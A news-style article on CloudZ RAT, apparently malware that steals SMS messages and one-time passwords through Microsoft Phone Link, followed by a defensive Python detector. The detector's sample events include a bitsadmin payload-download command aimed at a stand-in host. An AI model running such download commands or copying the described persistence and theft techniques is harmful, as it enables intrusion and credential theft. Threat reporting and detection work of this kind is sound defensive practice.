Security researchers have found a new and dangerous malware called CloudZ RAT. It secretly enters Windows computers and targets Microsoft Phone Link. Its goal is to steal private messages and one-time passwords (OTPs) from phones connected to the computer.
This attack has been happening since at least January 2026. It puts users at risk because hackers can steal SMS texts, call logs, notifications, and OTP codes used for bank logins or app verification. The scary part is that they can do this without touching the phone itself. Experts from Cisco Talos discovered this attack and warned that anyone using Phone Link could be at risk if their PC is infected.
The attack begins when hackers trick users into downloading a fake software update. It looks like an update for ScreenConnect, which is a real remote support tool. The fake file may have names like “systemupdates.exe” or “Windows-interactive-update.exe.” Inside this file is hidden malicious code written in Rust that quietly installs more harmful programs.
The hidden code then drops a second program that keeps itself running through a Windows scheduled task and executes via trusted system tools such as regasm.exe, so that its activity blends in with legitimate processes. Soon, the full CloudZ RAT gets installed. It is designed to evade antivirus detection using tricks such as anti-debugging checks, sandbox detection, and disguising its network traffic as ordinary web activity.
Once installed, CloudZ connects to hacker-controlled servers to receive instructions. It also downloads extra tools, including a new plugin called Pheno. This plugin specifically targets Microsoft Phone Link.
Pheno watches for important Phone Link processes such as YourPhone.exe, PhoneExperienceHost.exe, and Link to Windows. It then accesses local database files like PhoneExperiences-*.db. These files store synced data from the phone, including messages, notifications, and OTPs from banks or emails.
This is dangerous because Phone Link acts as a direct connection between the phone and the computer. If the computer is infected, hackers can see everything synced from the phone, including private chats and security codes. The malware can store this data temporarily and then send it to hacker servers.
Pheno also checks if Phone Link is actively connected and only steals data when the connection is live. This makes the attack more effective. Since no malware is needed on the phone, the attack works faster and is more dangerous, especially for users who rely on SMS-based logins.
CloudZ uses several methods to download its additional files. If one method fails, it falls back to others such as curl, PowerShell, or bitsadmin, so blocking a single download tool does not stop the infection. Reports confirm that this threat is active as of May 2026, but it is still unknown who is behind it or how many people have been affected. The main goal is to steal login credentials and authentication codes.
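As an added example (not code from this article or from Cisco Talos), here is a small Python detector that checks the three behaviours described above, regasm.exe started from a scheduled task, a curl/PowerShell/bitsadmin download spawned by a dropper in a user-writable directory, and a non-Phone Link process opening PhoneExperiences-*.db, against constructed Sysmon-style events. The allowlist, path patterns and sample events are assumptions made for illustration.

```python
import re
from pathlib import PureWindowsPath
# Assumption for this example: only Phone Link's own processes should read its database.
PHONE_LINK_PROCESSES = {"yourphone.exe", "phoneexperiencehost.exe"}
# The fallback download utilities named in the article, plus verbs that indicate a fetch.
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "powershell.exe"}
DOWNLOAD_VERBS = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|/transfer|\bcurl\b", re.I)
# A parent binary living in a user-writable directory (heuristic; tune to the environment).
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\(appdata|downloads)|users\\public|temp|programdata)\\", re.I)
# Task Scheduler runs tasks from the Schedule service host (svchost -s Schedule) or taskeng.exe.
SCHEDULER_PARENT = re.compile(r"-s\s+Schedule\b|\\taskeng\.exe", re.I)
PHONE_LINK_DB = re.compile(r"PhoneExperiences-[^\\]*\.db$", re.I)

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def detect(ev: dict) -> list:
    """Return the names of the rules that a single process or file-access event triggers."""
    hits, image = [], basename(ev["image"])
    # Rule 1: regasm.exe started by a scheduled task (persistence plus trusted-binary execution).
    if image == "regasm.exe" and SCHEDULER_PARENT.search(ev.get("parent_cmdline", "")):
        hits.append("regasm-from-scheduled-task")
    # Rule 2: curl/PowerShell/bitsadmin fetch spawned by a binary in a user-writable directory.
    if (image in DOWNLOADERS and DOWNLOAD_VERBS.search(ev.get("cmdline", ""))
            and USER_WRITABLE.search(ev.get("parent_image", ""))):
        hits.append("downloader-from-user-writable-parent")
    # Rule 3: the Phone Link database opened by anything other than Phone Link itself.
    if PHONE_LINK_DB.search(ev.get("target_file", "")) and image not in PHONE_LINK_PROCESSES:
        hits.append("phonelink-db-read-by-foreign-process")
    return hits

def scan(events: list) -> list:
    # (image, rules) for every event that triggers at least one rule
    return [(ev["image"], hits) for ev in events if (hits := detect(ev))]

# Constructed sample events in a Sysmon-like shape; not real telemetry from this campaign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe /U C:\ProgramData\svc\helper.dll",
     "parent_cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download http://example.invalid/p C:\Users\Public\p.bin",
     "parent_image": r"C:\Users\Public\systemupdates.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c Invoke-WebRequest https://example.invalid/a -OutFile a.txt",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Program Files\WindowsApps\YourPhone\PhoneExperienceHost.exe",
     "target_file": r"C:\Users\alice\AppData\Local\Packages\YourPhone\LocalCache\PhoneExperiences-1.db"},
    {"image": r"C:\Users\alice\AppData\Roaming\svc\pheno.exe",
     "target_file": r"C:\Users\alice\AppData\Local\Packages\YourPhone\LocalCache\PhoneExperiences-1.db"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the regasm, bitsadmin and pheno.exe events and leaves the cmd-launched PowerShell fetch and Phone Link's own database read alone.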
To stay safe, experts recommend downloading software only from official and trusted websites. Do not click on links or open email attachments from unknown sources. Keep antivirus software updated so it can detect such threats.
Users should also be careful when linking their phones to shared or work computers through Microsoft Phone Link. Regularly check active sessions in the app settings. Although Microsoft has not released a specific fix yet, using full-disk encryption and stronger authentication methods (not just SMS) can provide better protection.